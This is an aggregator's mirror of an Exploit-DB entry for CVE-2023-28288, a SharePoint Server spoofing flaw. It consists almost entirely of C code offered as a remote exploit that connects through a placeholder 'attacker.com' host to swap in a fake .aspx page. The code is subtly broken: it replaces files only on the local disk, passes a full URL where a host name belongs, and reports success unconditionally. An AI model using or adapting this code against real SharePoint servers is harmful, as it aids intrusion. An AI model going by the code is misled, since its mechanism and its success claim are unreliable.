4

[webapps] Microsoft SharePoint Enterprise Server 2016 - Spoofing

 1 year ago
source link: https://www.exploit-db.com/exploits/51543
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Microsoft SharePoint Enterprise Server 2016 - Spoofing

EDB-ID:

51543

EDB Verified:

Platform:

Multiple

Date:

2023-06-26

Vulnerable App:

// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288

#include <windows.h>
#include <stdio.h>


// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";

// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";

// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";

// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");

    return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK